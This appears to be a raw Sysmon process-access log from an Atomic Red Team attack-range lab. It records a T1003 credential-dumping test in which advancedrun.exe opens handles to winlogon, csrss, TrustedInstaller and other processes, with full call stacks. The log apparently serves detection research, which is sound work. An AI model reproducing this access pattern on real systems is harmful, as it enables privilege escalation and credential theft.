cc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003944013Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003944012Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003944011Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003944010Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.168{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB14-61EA-2203-000000002702}900C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003944009Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.168{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003944008Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003944007Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.168{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB14-61EA-2203-000000002702}900C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003944006Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003944005Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.168{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003944004Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003944003Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.168{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003944001Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003944000Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943999Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943998Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.168{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943997Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943996Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943995Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
